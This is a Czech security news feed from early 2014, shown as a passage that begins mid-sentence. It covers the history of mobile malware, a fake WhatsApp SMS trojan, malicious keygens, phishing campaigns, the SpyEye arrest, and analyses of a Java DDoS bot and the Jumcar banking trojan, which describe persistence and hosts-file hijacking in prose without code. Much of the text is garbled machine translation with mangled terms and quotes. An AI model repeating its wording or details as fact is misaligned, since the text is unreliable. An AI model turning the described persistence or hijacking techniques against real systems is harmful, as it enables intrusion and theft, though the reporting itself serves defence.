prostředek generování hotovosti proud přidané Apvrille, "Až do vzniku RedBrowser, bezpečnostní komunita věřil, že to bylo nemožné, aby jeden kus malware mohl infikovat širokou škálu mobilních telefonů s různými operačními systémy. Využití J2ME jako útočný vektor byl důležitým mezníkem v tomto období, stejně jako používání SMS zpráv jako mechanismus penězotvorné ". 2007-2008: období přechodu přes stagnaci ve vývoji mobilních hrozeb v průběhu tohoto dvouletého období došlo k nárůstu počtu malware, který přístupné služby se zvýšenou sazbou bez vědomí majitele zařízení. 2009: Zavedení mobilní botnet na počátku roku 2009, Fortinet objevil Yxes (přesmyčka "Sexy"), kus malware za zdánlivě legitimní "Sexy View" aplikace. Yxes také měl vyznamenání za bytí certifikované aplikace Symbian, který využil vtípek v rámci Symbian ekosystému, který umožnil vývojářům "odhlásit" aplikace samotné. Jakmile infikován, mobilní telefon oběti dopředu svůj adresář do centrálního serveru. Server potom předá SMS, která obsahuje adresu URL pro každý z kontaktů. Oběti, kteří kliknou na odkaz na stažení zpráv a nainstalovat kopii malware, a proces se opakuje. šíření Yxes byla do značné míry omezena do Asie, kde je infikováno nejméně 100.000 zařízení v roce 2009. "Yxes byl další zlomový ve vývoji mobilního malwaru z několika důvodů, "řekl Apvrille. "Za prvé, je považován za první malware zaměřením na operační systém Symbian 9. Za druhé, to byl první malware poslat SMS a přístup na internet bez vědomí mobilního uživatele, vývoj považován za technologickou inovaci v malware. Konečně, a co je možná nejdůležitější, hybridní model, který je použit pro samostatně výdělečně propagovat a komunikovat se vzdáleným serverem, dal Antivirus analytici důvod se obávat, že to byl možná forewarning pro nový druh viru - botnety na mobilních telefonech. Budoucí události by později ověřit, že vnímání ". 2010: Průmyslová věk mobilní malware 2010 znamenal významný milník v historii mobilního malwaru: přechod z geograficky lokalizovaných jednotlivců nebo malých skupin, aby ve velkém měřítku, pořádané zločinci působí na celosvětovém základě . To je začátek "industrializace mobilní malware", v níž útočníci uvědomili, že mobilní malware může snadno přinést hodně peněz, což vyvolalo rozhodnutí využívat hrozby mnohem intenzivněji. Rok 2010 byl také zavedení první mobilní malware odvozené od PC malware. Zitmo, Zeus v Mobile, byl první známý prodloužení Zeus, vysoce virulentní bankovnictví Trojan byl vyvinut pro PC světě. Práce ve spojení s Diem, Zitmo je hybnou silou, zločinci, aby se vyhnula používání SMS zpráv v on-line bankovních transakcí, a tím k obcházení zabezpečení procesu. Tam byl jiný malware v titulcích i v letošním roce, především Geinimi. Geinimi byl jedním z prvních malware navržen tak, aby útok na platformu Android a pomocí infikovaných telefon jako součást mobilní botnet. Po instalaci do telefonu, to by komunikovat se vzdáleným serverem a reagovat na širokou škálu příkazů - např. instalací nebo odinstalováním aplikací -. Který umožnil, aby efektivně převzít kontrolu nad telefonem "Zatímco zavedení mobilního malwaru pro Android a mobilní botnety byly jistě významné události v průběhu roku 2010, byly zastíněny rostoucí přítomností organizovaných zločinci, kteří začali využívat ekonomickou hodnotu mobilní malware, "řekl Apvrille. 2011: Android, Android a ještě Android s útoky na Android platformy zintenzivnění, silnější malware se začaly objevovat v roce 2011. DroidKungFu, například, se objevil s několika unikátními vlastnostmi, a dokonce i dnes je považován za jeden z nejvíce technologicky vyspělých virů v existenci. Malware včetně dobře-známý využít na "root" nebo se stát správcem telefonu - udev nebo Rage Against The Cage - což je úplnou kontrolu zařízení a schopnost kontaktovat příkazový serveru. To byl také schopný se vyhnout detekci anti-virus software, první bitva v probíhající válce mezi zločinci a anti-virus vývojářské komunity. Stejně jako u většiny virů před tím, DroidKungFu byl obecně dostupné od neoficiálních app obchodech a na fórech třetí strany v Číně. Plankton také přišel na scénu v roce 2011 a je stále jedním z nejrozšířenějších Android malware. Dokonce i na Google Play, oficiální Android apps store, Plankton se objeví ve velkém množství aplikací jako agresivní verze adware, stahování nevyžádané reklamy na telefonu, mění domovskou stránku mobilního prohlížeče nebo přidání zprávy zkratky a záložky na mobilní uživatele telefon. "S planktonu, budeme nyní hrát v první lize! Plankton je jedním z top 10 nejčastějších virů v rámci všech kategorií tím, že by ve stejné lize jako top PC viry, "dodal Apvrille. "Dny mobilní malware, které zaostávají za svými PC protějšky, jsou pryč. V současné době existuje více než 5 milionů zařízení infikovaných Plankton sám. " 2013: Hra na - nových způsobů útoku 2013 znamenal příchod FakeDefend, první ransomware pro Android mobilní telefony. V přestrojení jako antivirus, tento malware funguje podobným způsobem jako na falešný antivirus na počítači. Zaklapne telefon a vyžaduje, aby oběť zaplatit výkupné (ve formě přehnaně vysoké antivirovým paušálního poplatku, v tomto případě), aby bylo možné načíst obsah zařízení. Nicméně, platit výkupné nijak opravit telefon, který je třeba resetovat do továrního nastavení, aby se obnovila funkčnost. To bylo také v roce 2013, že Chuli poprvé objevil. Chuli malware byl považován za první cílený útok na platformě Android. Počítačoví zločinci za útokem zadlužuje e-mailový účet a aktivista na Světové ujgurské konference, která se konala March 11-13, 2013 v Ženevě, zaměřit se na účty jiných tibetského aktivisté za lidská práva a obhájci. E-maily odeslané z pirát účtu včetně CHULI jako přílohu, kus malware určený ke sběru dat, jako jsou příchozí SMS, SIM karty a telefonu kontakty, informace o umístění a nahrávky telefonních hovorů obětí. Zachycená informace pak byly odeslány na vzdálený server. "2013 je možno považovat rok mobilních útoky" profesionálem, "řekl Apvrille. "Stále více cílené a sofistikované, malware, jako FakeDefend nebo Chuli jsou příklady útoků srovnatelné známe dnes v PC světě. Kromě toho, že je to naprosto rozumné se zeptat, zda útok jako Chuli je ohlašovat nás do éry mobilních kybernetické války a začátek potenciálních postižením s vládami a dalšími národními organizacemi. " Co bude dál? Díky počítačové trestné činnosti, je vždy obtížné předpovědět, co se bude dít příští rok, a ještě více tak v průběhu příštích 10 let. Krajina mobilních hrozeb se dramaticky změnila v posledních deseti letech a cybercriminal komunita stále najít nové a stále důmyslné způsoby použití těchto útoků pro jeden jediný účel -. Vydělávání peněz však, s explozí chytrých telefonů a dalších mobilních technologií, přiměřené Predikce je konvergence mobilních a PC malware. Jako všechno, co se stane "mobilní", všechny malware pak bude "mobile". Kromě mobilních zařízení, s největší pravděpodobností budoucí cíl pro zločinci je internet věcí (internetu věcí). Zatímco velmi obtížné odhadnout počet připojených objektů na trhu v příštích pěti letech, Gartner odhaduje 30 miliard objekty budou připojeny v roce 2020, zatímco IDC odhaduje, že trh je 212000000000. Stále více a více výrobců a poskytovatelů služeb se vydělávat na obchodní příležitosti předložila těchto objektů, ale to je rozumné předpokládat, že bezpečnost nebyla dosud vzata v úvahu v procesu vývoje nových produktů. Bude internetu věcí bude "The Next Big Thing" pro cybercriminal?
Falešnou WhatsApp místo doručuje polymorfní SMS Trojan 2.2.2014 Mobil | Viry Více populární on-line služba nebo aplikace je, tím větší je pravděpodobnost tato popularita bude zneužita cyber podvodníci oklamat uživatele do stahování malware či sdílení osobních a finančních informací. Rostoucí popularita služby instant messaging WhatsApp je dokonalým příkladem, jak počítačoví zločinci po celém na světě se neustále zřídit systémy zneužití služba je dobré postavení. Nejnovějším příkladem, všiml výzkumníky Malwarebytes ', přichází v podobě webové stránky nabízející aplikace pro rusky mluvící uživatele.
Tato stránka je spoof oficiálních stránkách dané služby, a vypadá docela přesvědčivý. Je to zřejmě nabízí verze aplikace pro iOS, Android, Nokia, Windows Phone a BlackBerry. V tomto případě pouze uživatelé s zařízení se systémem Android jsou v ohrožení, protože nabízené aplikace je vlastně Android SMS Trojan. Po instalaci na zařízení, malware začne vysílat pricy textové zprávy na číslo pojistné sazby. "Trojan sám byl asi na chvíli, ale malware autoři servírují polymorfní soubory, které se mění s každou návštěvou," poznamenal vědci . "Změny zahrnují řetězce, jako je třídách název balíčku a java. Celková kód a datový tok zůstává stejný. Tato taktika není nutně zaměřen na uživatele, ale vyhnout se detekci AV dodavatelů.
Dejte si pozor na škodlivé specializovaných softwarových keygeny! 2.2.2014 Viry Maškarádu malware jako klíčové generátory populárních her je dobře známý malware, dodávka taktika, ale není to často, že vidíte škodlivé keygens pro jiné typy softwaru. Nicméně, to se stává občas. Výzkumníci Trend Micro varuje, že v posledních několika týdnech, malware trhovců byly zaměřené odborníky, kteří pracují v různých průmyslových odvětvích s tímto přístupem. Oni našli falešné generátory pro specializované (a drahé), strojírenství (AVEVA) a opravy automobilů softwaru (AllData), multimediální nástroje (Bigasoft), benchmarking software (Geekbench), software pro chemiky a biology (CambridgeSoft), výpočetní software (Wolfram Mathematica), a, ano, některé hry. Bohužel, nabízené spustitelné soubory nejsou tím, čím se zdají být. Jakmile se nainstalují, připraví cestu pro další škodlivý software, který bude instalován na ohrožení počítače, a v poslední době, že software je často falešný AV varianta. "Fake antivirový software, který výrazně snížil z jeho rozkvětu před několika lety (částečně kvůli zásahy na jejich platební systémy), "výzkumníci zdůraznil . "Od té doby, to bylo zastíněno první policejní ransomware a pak ve více nedávných měsících od CryptoLocker.
Webové stránky Hasbro ohrožena, slouží malware 2.2.2014 Viry Oficiální internetové stránky dobře-známý výrobce hraček Hasbro byl kompromitován a našel slouží malware na nic netušící návštěvníky na několika příležitostech během posledních několika týdnů. Podle Barracuda Labs výzkumné pracovníky, místo nebylo ohroženo přes škodlivé reklamy, jak je to často případ , ale přímo, a to povede návštěvníky přes řetězce přesměrování na webové stránky hosting Java využije. Pokud je počítač návštěvníka se ukázalo být náchylné k nim, download informačního krádež Trojan varianta, která byla zpočátku není detekován některý z AV řešení používané VirusTotal. Uživatelé, kteří navštívili stránky 10. ledna, 11, 14 a 20 pravděpodobně měl jejich počítače infikované, tak oni jsou vyzýváni, aby skenovat svůj stroj s jedním z AV řešení, která detekují malware v otázce . , ale aby se na bezpečné straně, každý, kdo navštívil stránky v poslední době by to dobře, aby tak učinily také. Vyhnout webové stránky v současné době může také není špatný nápad, jak jsme čekat na své operátory čistý dům.
Bouře phishing a malware útoky s využitím téma Světového poháru pokračuje - před několika měsíci jsme zaznamenali několik škodlivých kampaní s tímto tématem. Pro zpestření útoky a přilákat více obětí, brazilské zločinci se rozhodli investovat své úsilí o šíření falešné dárky a podvodné webové stránky prodávající vstupenky na hry na velmi nízké ceny, jízdenky, které ve skutečnosti neexistují.
Útoky spustí, když uživatel dělá jednoduché vyhledávání na Google, hledá pro webové stránky, které prodávají vstupenky Světového poháru. Zlí hoši registrované podvodné domény fifabr.com , které se zobrazí mezi prvními výsledky jako sponzorovaný odkaz:
Podvodné webové stránky nabízejí vstupenky na brazilských her za cenu 70,00 dolarů:
Produkty Kaspersky blokuje několik podvodných domén denně, všechny z nich používáte téma Světového poháru. Takové útoky jsou zaměřeny zcela na brazilských uživatelů a zprávy obecně používají názvy místní kreditní karty, banky a velké obchody, atd.
Phishingových zpráv s podvodným dárky jsou stále běžné, stejně - některé nabízejí volné vstupenky, hotovost, nebo dokonce zdarma cestování:
"Gratuluji, jsi vítěz volnou vstupenku na mistrovství světa"
Chcete-li získat volnou vstupenku, že je nutné, aby všechny vaše osobní údaje a číslo své kreditní karty na podvodné webové stránky:
Neymar a Fuleco čekají na vaše data kreditní karty
Někteří protivníci mají také vytvořil falešný prozradí, že je platný i po hrách:
"Dáváme ceny po mistrovství světa" jen další podvodnou domény
Až do začátku her mnoho dalších útoků se mohou objevit - ale my jsme připraveni je blokovat. Neriskujte snaží koupit vstupenky na hry na neznámých místech - to je bezpečnější koupit na internetových stránkách FIFA , bude on-line prodej začíná 12. března 2014.
Ruský tvůrce "SpyEye" malware přiznává, že bankovní podvody 30.1.2014 Viry
FBI oznámila zatčení a obvinění z Alexsandr Panin, 24, ruský hacker, který vyvinul SpyEye trojský kůň, a používal to, aby ukrást finanční informace a peníze z celého světa.
V prohlášení ministerstva spravedlnosti , Ricky Maxwell, úřadující zvláštní agent v poplatku, řekl, že: "zadržení pana Panin znamená, že jeden z nejlepších světových vývojářů škodlivého softwaru je již v pozici, vytvářet počítačové programy, které mohou postihovat lidi po celém světě. "
"Botnety, jako SpyEye představuje jednu z nejnebezpečnějších typů škodlivého softwaru na internetu dnes, které lze ukrást identitu a peníze lidí ze svých bankovních účtů bez jejich vědomí."
Panin vytvořil SpyEye v roce 2009. To je myšlenka k infikovaných více než 1,4 milionu počítačů ve svém životě, vytváří masivní botnet k pronájmu. Včera se přiznal k spiknutí s cílem spáchat drát a bankovní podvody u soudu v severní obvod Gruzie.
"Vzhledem k tomu, že nedávné odhalení masivní krádeže finančních informací z velkých maloobchodních prodejen po celé zemi, Američané nepotřebují třeba připomenout, jak zničující je, když počítačoví zločinci tajně nainstalovat škodlivý kód na počítačových sítích a sifon mimo osobní informace od nic netušících spotřebitelů, "řekl úřadující náměstek generálního prokurátora Mythili Raman.
Registrovat se uvádí, že Panin prodává vlastní verze SpyEye o tajuplných fóra pro od 1000 dolarů a 8500 dolarů. On je myšlenka k prodal SpyEye nejméně 150 lidí, z nichž jeden, s použitím "Soldier" alias používá malware ukrást $ 3,2 metrů.
Více než 10.000 bankovní účty po celém světě jsou myšlenka k byli hacknutý SpyEye. Panin zatčení vedl čtyři další zatýkání - ve Velké Británii a Bulharsku - lidí je známo, že se používají malware.
SpyEye byl použit jeden východní Evropy elipsoidnímu gang ukrást přibližně 70 m $ ze společnosti, církví a státních organizací v USA a Evropě, v závislosti na Yahoo .
Panin byl nejprve zkoumán v roce 2011, kdy agenti FBI zabavila SpyEye serveru v Gruzii. Pozdnější ten rok, agenti komunikovali s Panin - pod jeho jinak 'Gribodemon "a" Harderman "- včetně verze softwaru.
Byl zatčen v červenci 2013 okamžitě vydán do Atlanty, Gruzie. Panin byl na dovolené, na návštěvě kamaráda v Dominikánské republice, v závislosti na Rusku dnes .
Mluvčí ruského ministerstva zahraničí odsoudil zatčení: "Samozřejmě, že jsme vážně znepokojeni skutečností, že opět týká zatčení ruského občana s americkým rozkazu ve třetí zemi. Myslíme si, že skutečnost, že tyto praktiky se stává začarovaný tendence je naprosto nepřijatelné a nepřípustné, " říká ruské ministerstvo zahraničí informace a tiskové oddělení náměstek ředitele Maria Zacharová.
Na začátku tohoto roku jsme obdrželi škodlivý Java aplikace pro analýzu, což se ukázalo být multi-platforma bot schopný běžet na Windows, Mac OS a Linux. Bot byl psaný úplně v Javě. Útočníci používají zranitelnosti CVE-2013-2465 infikovat uživatelům s malware.
Inicializace a dešifrování řetězce Chcete-li analýzu a detekci malware těžší, jeho vývojáři použili Zelix Klassmaster Obfuscator. Kromě toho plést bytecode, Zelix šifruje řetězcové konstanty. Zelix vygeneruje jiný klíč pro každou třídu - což znamená, že aby bylo možné dešifrovat všechny řetězce v aplikaci, budete muset analyzovat všechny třídy, aby bylo možné nalézt dešifrovací klíče.
Inicializační řetězec a dešifrování se provádí ve statickém Inicializátor kódu (<clinit>).
Šifrované inicializační řetězec
Algoritmus je následující: mít aktuální index zašifrované znaku v řetězci, spočítat zbytek z jeho dělení 5 a vyberte aktuální klíč v závislosti na výsledku. Dále identifikovat dešifrovat charakter provedením modul 2 bitový doplněk k vybranému tlačítku. String dešifrování
Pro konkrétní případ, dešifrování algoritmu vypadá takto: Provádění Python z dešifrování algoritmu
Zahájení Po spuštění bota kopíruje do domovského adresáře uživatele a sám se nastaví spuštění při startu systému. V závislosti na platformě, na které bylo zahájeno bot, tato metoda se používá pro přidání do autostart programů:
Pro Windows - HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run Mac OS - standardní služba launchd Mac OS se používá Pro Linux - / etc / init.d / Tělo bot obsahuje zašifrovaný konfigurační soubor pro launchd služby.
Dešifrovat konfigurační soubor pro launchd služby
Po spuštění a nastavení se spouštět při startu systému, bot musí tuto skutečnost oznámit svým majitelům. Chcete-li poskytnout prostředek identifikace každého bot, jedinečný identifikátor bot je generován na každém počítači uživatele. Identifikátor se uloží do souboru jsuid.dat v domovském adresáři uživatele.
Obsah jsuid.dat
Ovládání bot Bot je ovládán pomocí protokolu IRC. To nás vede k ještě jeden zvědavý rys tohoto malware - používá PircBot otevřený rámec k naplňování komunikaci přes IRC. Malware zahrnuje všechny třídy potřebné pro tento účel.
Po spuštění malware iniciuje připojení k IRC serveru.
Připojení k IRC serveru
Po úspěšném navázání spojení, bot připojí předdefinovaný kanál a čeká na příkazy útočníků:
Připojení IRC kanál
Hlavní funkce Bot je navržen tak, aby provedla DDoS útoky z infikovaných uživatelů počítačů.
Bot podporuje dva typy povodní:
HTTP UDP Který typ útoku je třeba použít je určen útočník v IRC kanál pro zombie strojů. Kromě toho, že tyto parametry jsou uvedeny:
Adresa počítače, které mají být napaden Číslo portu Doba trvání útoku Počet vláken, které mají být použity v útoku
Generování hlavičky během povodní HTTP útok
Hodnota User-Agent, které mají být vloženy do HTTP požadavku je vybrán náhodně ze seznamu uloženého v těle bota v šifrované podobě.
Dešifrovat seznam hodnot uživatelského agenta podporovaných bot
Při analýze malware, jsme zjistili pokus napadnout hromadné e-mailové služby.
Příkaz k útoku
Kaspersky Lab detekuje malware jako HEUR: Backdoor.Java.Agent.a .
Rádi bychom poděkovali Zoltan Balazs, CTO v MRG Effitas, pro sdílení vzorek malware s námi.
Nebezpečný virus cílí na bankovní účty v Česku
27.1.2014 Viry | Phishing V posledních dnech ve vodách českého internetu pluje nebezpečný virus, pomocí kterého se snaží počítačoví piráti vysát lidem peníze z účtu. Obejít dokonce dokážou i verifikaci prostřednictvím mobilního telefonu, kterou banka ověřuje, zda se má transakce opravdu uskutečnit. Před nezvaným návštěvníkem varovala Česká spořitelna. V podvrženém internetovém bankovnictví podvodníci uživatele vyzvou k instalaci programu, který je podle nich nutný ke správě účtu on-line Ve chvíli, kdy se kyberzločincům podaří trojského koně propašovat do cizího počítače, zaměří se také na uživatelův chytrý telefon, aby získali přístup k autorizačním SMS zprávám. Vzhledem k tomu, že většina uživatelů zabezpečení svých mobilních přístrojů podceňuje, je hrozba o to větší.
Do smartphonu se útočníci zpravidla dostanou jednoduchým trikem. V podvrženém internetovém bankovnictví uživatele vyzvou k instalaci programu, který je podle nich nutný ke správě účtu on-line. Pokud tak uživatel učiní, nic již kyberzločincům nebrání k vysátí peněz z účtu.
Podvodná zpráva připomínající službu Servis 24 České spořitelny.
„Nikdy neinstalujte do svých mobilních telefonů aplikace z neznámých zdrojů. Pokud se vám při práci v internetovém bankovnictví objeví na monitoru neznámé okno a bude vás vybízet k instalaci bezpečnostní aplikace, nikdy na to nereagujte,“ varovali zástupci České spořitelny.
„V případě, že byste zaznamenali nezvyklé chování ve vašem internetovém bankovnictví, např. zmíněné nabízení instalace bezpečnostní aplikace do mobilního zařízení, tak neprodleně kontaktujte bezplatnou informační linku České spořitelny 800 207 207,“ vyzvali zástupci banky v souvislosti se službou Servis 24. Ohrožení by se ale mohlo týkat i dalších bank.
Obdoba tohoto viru se objevila už v polovině loňského roku. Tehdy před touto formou hackerských útoků varovala Česká bankovní asociace (ČBA) s tím, že hrozba se týká více bankovních institucí. Stejný druh podvodů byl zachycen také v zahraničí.
Červ útok! Vaše schránka je v ohrožení 27.1.2014 Viry
V naší praxi se často setkáváme s případy, kdy jsou zprávy s nebezpečným přílohu hmotnost-mailem na mnoho adres současně. V poslední době, když jsme viděli řadu zpráv odeslaných trvale na stejnou e-mailovou adresu. Zdá se, že hlavním cílem útočníka bylo infikovat, že počítač - všechny e-maily, bez ohledu na to, co jejich hlavičky byly obsaženy Email-Worm.Win32.NetSky.q. Charakteristickým rysem tohoto červa je, že se šíří prostřednictvím e-mailových příloh. Po infikování počítače, červ najde všechny e-mailové adresy v něm a kopie sám na ně, s využitím specifických krátké fráze a vyhnout se jakékoliv e-mailové adresy, které mohou být přímo spojeny s poskytovateli IT zabezpečení, jako jsou antivirové společnosti.
První zpráva, kterou zjištěna údajně přišli z platebního systému PayPal. Text v těle dopisu řekl, že byl účet pro uživatele v příloze.
Nicméně, uživatelé výstrahy může připomenout, že PayPal typicky obsahuje fakturační údaje v textu, a nikoli v přiloženém souboru.
Další e-mail přišel ve jménu USA Hosting správy. Lákat uživatele k otevření přílohy, útočníci říkají, že uživatel "mailový účet vypršel", a naznačují, že ho uživatel aktivuje se "detaily" v příloze.
Třetí email údajně přišel z dodavatele antivirového softwaru Symantec. Zpráva říká, že počítač uživatele byl napaden novým virem. Chcete-li jej odstranit, musí uživatel stáhnout přiložené antivirové podpisy. Opět platí, že výstraha uživatel může být podezřelý z toho, že podpis byl od konkurenční antivirové společnosti BitDefender.
Všechny tyto dopisy přišel během téhož měsíce, a ačkoli oni měli různé předměty, které mají stejné cíle infikování počítače uživatele a šíření malwaru v síti. Proto bychom chtěli upozornit uživatele, že extra opatrnost je potřebná při jednání s jakýmkoliv e-mail, který přijde s přílohami. Je důležité si uvědomit, že každý úřední dopis by měl mít vhodnou konstrukci - a autentické loga a podpisy. Pokud jsou uživatelé jisti identitou odesílatele, stojí za to kontaktovat linku technické podpory firmy pro potvrzení. Použití rozumné opatření pro příchozí poštu, v kombinaci se spolehlivým bezpečnostním produktu, pomáhá udržovat váš počítač v bezpečí před nebezpečím z kyberprostoru.
Symantec se snaží patentu technologie nanášení škodlivé torrenty
26.1.2014 Viry
V myslích většiny lidí, koncept torrentů je obecně spojován s pirátského obsahu. Přes toto, každý by měl vědět, že BitTorrent je přenos souborů / sdílení protokol, který lze použít pro právní, tak i pro nelegální činnosti. zbraní a popularita torrent stránek neprošel bez povšimnutí počítačoví podvodníci, kteří se domnívají, je skvělý způsob, jak distribuovat malware a vést uživatele k podvodům. "Každý den tisíce" falešných "bystřin jsou nahrané před škodlivými zdrojů, často označené jmény populárních filmů a televizních pořadů," TorrentFreak poukazuje . "Netřeba říkat, že ti, kdo si stáhnout tyto torrenty nedostanou to, co hledali." To je nemožné říci, zda torrent je škodlivý, nebo ne jen tím, že při pohledu na název souboru, ale Symantec věří, že mají dobré řešení pro nanášení špatné jablka. řešení, pro které společnost podala patent, spoléhá na důvěryhodné informace spojené s vrstevníky, tracker, původní nahrál, apod. Technologie je stanovena na odhalení alespoň jednoho subjektu podílejícího se na torrenty transakce (snad více), a na analýzu jeho (jejich) důvěryhodnost.
Na základě tohoto hodnocení, řešení, určuje, zda soubor torrent představuje riziko pro uživatele, a umožňuje uživateli, aby si vybral, co dělat s těmito informacemi, tedy to, co "bezpečnostní opatření", aby se. "Příklady takových bezpečnostních opatření zahrnují, aniž by omezení, upozorní uživatele na potenciální bezpečnostní rizika, blokuje přístup k cílovému souboru, dokud zrušen uživatelem, blokování síťového provozu spojené s torrent transakce, do karantény cílový soubor, a / nebo odstranění cílového souboru, "společnost je vysvětleno v patentová přihláška . Pochybuji, že systém je spolehlivý, ale zdá se, že to může pomoci zmírnit problém škodlivých torrentů.
Z Latinské Ameriky s láskou, Jumcar udeří znovu 24.1.2014 Viry
Nový vzorek byl předložen k Virus Total systému 18. ledna ročníku , který byl rychle spatřen můj kolega Dmitrij Bestuzhev . Zajímavé je, zdá se, že nová varianta Jumcar malware rodině se objevil a mnoho změn, které byly provedeny na původní zdrojový kód. Protože se jedná Latinské Ameriky na zakázku malware existuje spousta řetězců písemných ve španělštině, některé z nich, které nebudeme zmiňovat, protože oni jsou chtěl urazit bezpečnostních výzkumníků, zatímco oni zkontrolujte kód.
Oni První věc, která upoutala naši pozornost byla přítomnost nějaké informace o ladění stále k dispozici v spustitelného souboru. Po velmi základní analýzu jsme potvrdili, že jsme se zabývali NET aplikací společnosti Microsoft. A řetězce jsme našli byla původní cesta, kde byl škodlivý práce je laděn do systému developera. Zřejmě "Victor" testoval svou novou tvorbu proti několika antivirových jader, protože vzorek byl předložen sám na Virus Total.
V přestrojení za nevinného "Facebook" aplikace, Jumcar láká uživatele na poklepáním na soubor infikovat systém a doručit nebezpečný náklad.
Zdá se, že docela nevinný, že jo?
Po spustitelný byl zahájen, bude to vypadat jako "Facebook" nástroj v procesu monitoru a zároveň se začne provádět některé zkoušky s připojením k síti, zda je možné stáhnout druhou etapu škodlivého kódu. V tomto případě se kontroluje pomocí Google (pomocí jak název domény a IP adresy), aby zjistili, zda je k dispozici připojení k internetu a stáhne další soubor potřebný pro infekci.
Pokud vše půjde tak, jak se očekávalo, bude Jumcar snažit získat textový soubor ze serveru umístěného v Chile, který obsahuje název banky, že se pokusí ukrást informace z. Tento seznam je také vhodně přejmenován jako "robots.txt" standardní vyloučení souboru tak, aby správcům IT nevšimne nic neobvyklého při kontrole své záznamy protokolu.
S tímto seznamem stažené, následující krok je použít k přepsání Windows hostí informaci umístěnou v% systemroot% \ system32 \ drivers \ etc \. Takže teď, pokaždé, když se uživatel pokusí o přístup k některé z oblastí uvedených v seznamu škodlivých hosts, že bude přesměrován na jinou IP a prezentovány s falešnou verzi požadované webové stránky místo. V současné době je tato IP je offline, ale protože soubor je načten dynamicky malware to lze snadno změnit výměnou soubor "robots.txt".
V předchozích verzích Jumcar, že cíle byly bankovní instituce, především z Peru. V této variantě, kód byl upraven tak, aby napadnout bolivijské banky, ale tam je nic zastavit malware tvůrci z rozšíření tohoto seznamu. To dává smysl, protože název shromáždění NET spustitelný soubor. byl "newbol", což by mohlo naznačovat nový bolivijský varianta.
Mnoho kryptografických funkcí jsou používány v rámci kódu ( nic nového, protože předchozí verze spoléhal se těžko na crypto ) přidat vrstvu mlžení a zmařit úsilí analýzy. Naštěstí kontrolora síťový provoz a demontáž. NET zdrojový kód jsme schopni získat nahlédnout, jak bylo provedeno vnitřní vývoj této hrozby. Tato nejnovější verze obsahuje řadu vestavěných řetězců, které se dešifrovat pomocí metody zvané GenerateRSAreverse (), přičemž každý řetězec a vytváří jasnou textovou verzi, která bude použita pro různé úkoly malware.
Například z následující části RSA šifrovaného textu, Jumcar získá název souboru pro vytrvalost (pomocí "winlogon.exe" v klíči registru CurrentVersion \ Run), IP adresu serveru, kde je potřebuje k získání "robots.txt" soubor a další.
Hlavní Logika této hrozby je stále poměrně jednoduchá a opírá se o rychle infikování systému a nahrazení souboru hosts, aby odcizení dat. I když to není velmi sofistikované, že se zdá být velmi efektivní a umožňuje útočníkům provést změny kódu rychle vytvářet nové varianty na vyžádání.
Není to velmi časté najít malware vyvinut v Latinské Americe, nebo pomocí NET technologii.. Nicméně v posledních měsících jsme byli svědky, že výhody rychlého vývoje kódu a rámcové použití jsou lákavé dost přesvědčit zločinci, aby přijaly vývoj software osvědčené postupy. S Ploutus , malware Bankomat také vytvořeny od nuly v regionu. NET se zdá, že španělsky mluvící malware svět je jen asi zajímavé. Pro tuto chvíli, to se zdá být jen pokus o malware tvůrce otestovat ceny detekce, ale budeme muset držet oči otevřené, protože skutečná hrozba může objevit v každém okamžiku. Od Latinské Ameriky s láskou , Jumcar je zde opět . Kaspersky Anti-Virus detekuje všechny uvedené vzorky heuristickou analýzou jako Trojan.Win32.Fsysna varianty.
Fake oznámení Target porušení vede k phishingové a složité podvody 21.1.2014 Viry | Phishing | Kriminalita
Rozsáhlá Target porušení se rozezněly široko daleko v amerických médiích, a její zákazníci měli starat o jejich osobní nebo informace o kreditní kartě jsou zneužívány. Po počátečním porušení zjevení na konci prosince, firma začala rozesílat oznámení o narušení bezpečnosti, aby potenciálně dotčených zákazníků, a pokračoval dělat tak v důsledku objevu dalšího ohrožení informací . ale počítačoví podvodníci se také začalo rozesílat oznámení v cílových jménem, se snaží přimět uživatele k podělí o své osobní údaje, stejně jako kompletní on-line průzkumy. Podle . počet těchto nevyžádaných e-mailů shromážděných Malcovery v posledních několika dnech, kampaň není (zatím) masivní e-mail na otázku se snaží získat pozornost obětem, ale hlásat "Upozornění na Target Zákazníci - vaše identita je ohrožena" v linka předmět. V současné době je e-mail odeslán z Yahoo e-mailovou adresu, která zřejmě nemá nic společného s Target. ale znepokojující obsah e-mailu, může však urychlit některé uživatele ke kliknutí na nabízené odkazy (klikněte na screenshotu pro zvětšení): Tato e-mail není reálné, jednoduché phishing e-mail. Uživatelé, kteří následují odkazy jsou přijata prostřednictvím řady přesměrování na stránku s přehledem a nabízí 1000 dolarů nákupní poukázku Sears / JCPenney / Kohl 's / Macy' s jako pobídka, hlásí Gary Warner , Malcovery spoluzakladatel a hlavní technolog. , ale jednou, že Šetření je ukončeno, jsou přesměrovány na nové průzkumy na různých stránkách běžet na systémech různých reklamních firem. mimo jiné, že oběti jsou instruováni, aby odpověděli na otázky, které mohou být použity k vytvoření poměrně přesnou představu o svých obchodních aktivit, které budou následně být přímo vázána na jejich reálného světa identity, protože oběti se pak vyzval, aby zadali své jméno, adresu, telefonní číslo, e-mailovou adresu, datum narození, atd. Jakmile tento úkol je u konce, stále existuje mnoho osobních otázek odpověděl: Pak otázky týkající se zaměstnanosti, vzdělání a zdraví jsou vyběhl, a vše, zatímco podvodníci viset na odměnu (která není obrátil na 150 dolarů Walmart dárkové karty) před uživatelů. Pak další sadu průzkumů je vyrukovali. A pak oběť je nutné stáhnout add-on (ShopAtHome.com Toolbar) a aby bylo jeho výchozího poskytovatele hledání a výchozí novou kartu. Nakonec, oni jsou řekl, že musí koupit sadu nožů se nebo se zaregistrujte pro kreditní zprávy služby, a pak si koupit více věcí. Složitost tohoto podvodu je ohromující. Bohužel, tam jsou vždy - vždy! -. Dost nezkušení uživatelé internetu, kteří spadají do něj, a dělat to stojí za to pro podvodníky.
Spammeři skupují doplňky pro Chrome a mění je v adware
21.1.2014 Spam | Viry Šiřitelé agresivní reklamy si našli nový způsob, jak své výtvory dostat k internetovým uživatelům.
V současné době jsou známé dva případy, kdy se dlouhou dobu legitimní rozšíření pro prohlížeč Chrome po prodeji změnilo ve zdroj vtíravé reklamy.
Jako první si nekalé praktiky nových vlastníků doplňku stěžoval Amit Agarwal, který svůj nástroj Add to Feedly v loňském roce prodal třetí straně. Ta jej pak bez jakýchkoliv rozpaků přeměnila v adware. V době prodeje mělo rozšíření přes 30 tisíc uživatelů.
